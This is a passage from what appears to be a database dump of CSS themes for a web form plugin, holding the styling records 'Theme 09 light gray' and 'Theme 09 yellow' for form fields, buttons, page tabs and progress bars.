Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #8A8A8A;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #CDCDCD;\r\nbackground-color: #F8F8F8;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 27px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 18px;\r\nmargin-right:3px;\r\nmargin-bottom:3px;\r\nfont-weight: bold;\r\n}\r\n.page_active {\r\n	color: #070068;\r\ncursor: pointer;\r\nbackground-color: #FFFFFF;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 22px;\r\npadding: 5px 25px 0px 25px;\r\nborder: 1px solid #EEEEEE;\r\nfont-weight: bold;\r\nmargin-right:3px;\r\nborder-bottom: none;\r\nline-height: 26px;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nmargin: 1px;\r\nborder-spacing: 0px;\r\nheight: 21px;\r\nline-height: 20px;\r\nfont-size: 15px;\r\nfloat: left;\r\ntext-align: right !important;\r\nz-index: 1;\r\nposition: relative;\r\nbackground: #070068;\r\n}\r\n.page_percentage_deactive {\r\n	height: 24px;\r\nline-height: 20px;\r\nbackground-color: #FFFFFF;\r\ntext-align: left !important;\r\nmargin: 0 5px;\r\nborder: 1px solid #EEEEEE;\r\ndisplay: inline-block;\r\nwidth: 98%;\r\nborder-bottom: none;\r\n\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: -1px;\r\n}\r\n\r\n.wdform_percentage_text {\r\n	color: #fff;\r\n	font-weight: bold;\r\n	font-size: 13px;\r\n	position: relative;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}', 0),
(31, 'Theme 09 light gray', '.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #DDDDDD;\r\nborder: 1px solid #818181;\r\nmargin-bottom: 10px;\r\ncolor: #818181;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-spinner-button\r\n{\r\nborder-radius:0px !important;\r\nbackground: none!important;\r\n}\r\n\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\n\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #000;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #8A8A8A !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\nborder-top: 1px solid #7F7F7F !important;\r\n\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 1px solid #B7B7B7;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/09/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/09/01/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/09/next.png) no-repeat right;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n        border: 1px solid #CECECE;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: url([SITE_ROOT]/images/09/previous.png) no-repeat left;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #CECECE;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #013D7C;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #DDDDDD;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\npadding:10px;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n\r\n}\r\n.wdform_section_break2 {\r\n	color: #013D7C;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 10px 40px 0px;\r\n\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #013D7C;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n\r\n}\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F8F8F8;\r\nborder: 1px solid #B7B7B7;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type="text"]:focus{\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #8B8B8B;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\ncursor: pointer;\r\n-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\nfilter: alpha(opacity=0);\r\nopacity: 0;\r\ncontent: "";\r\nposition: absolute;\r\nwidth: 13px;\r\nheight: 9px;\r\nbackground: url([SITE_ROOT]/images/09/checkbox.png) no-repeat;\r\nborder-radius: 0px;\r\ntop: 1px;\r\nleft: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #8B8B8B;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #8B8B8B;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #808080;\r\nbackground-color: #E5E5E5;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 27px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 18px;\r\nmargin-left:3px;\r\nmargin-bottom:2px;\r\n}\r\n.page_active {\r\n	color: #C2C2C2;\r\ncursor: pointer;\r\nbackground-color: #FFFFFF;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 22px;\r\npadding: 5px 25px 0px 25px;\r\nborder: 1px solid #7F7F7F;\r\nmargin-left:3px;\r\nmargin-bottom: -1px;\r\nborder-bottom: none;\r\nline-height: 26px;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nborder-spacing: 0px;\r\nheight: 10px;\r\nbackground: #727272;\r\nfloat: left;\r\n}\r\n.page_percentage_deactive {\r\nheight: 10px;\r\nline-height: 20px;\r\nbackground-color: #E5E5E5;\r\ntext-align: left !important;\r\nmargin-bottom: 2px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n}\r\n\r\n.wdform_percentage_text {\r\ncolor: #fff;\r\nfont-size: 12px;\r\nposition: relative;\r\nbackground: url([SITE_ROOT]/images/09/01/02.png) no-repeat;\r\nwidth: 36px;\r\ndisplay: inline-block;\r\nheight: 36px;\r\ntop: -37px;\r\nleft: 17px;\r\ntext-align: center;\r\nline-height: 27px;\r\nfloat: right;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}', 0),
(32, 'Theme 09 yellow', '.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #DDDDDD;\r\nborder: 1px solid #E9B500;\r\nmargin-bottom: 10px;\r\ncolor: #E9B500;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-spinner-button\r\n{\r\nborder-radius:0px !important;\r\nbackground: none!important;\r\n}\r\n\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\n\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #000;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #E9B500 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\nborder-top: 1px solid #7F7F7F !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 1px solid #B7B7B7;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/09/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/09/02/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/09/next.png) no-repeat right;\r\n	padding: 0px 36px 0  20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n        border: 1px solid #CECECE;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: url([SITE_ROOT]/images/09/previous.png) no-repeat left;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #CECECE;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #E9B500;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #DDDDDD;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\npadding:10px;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #013D7C;\r\n	display: inline-block;\r\n	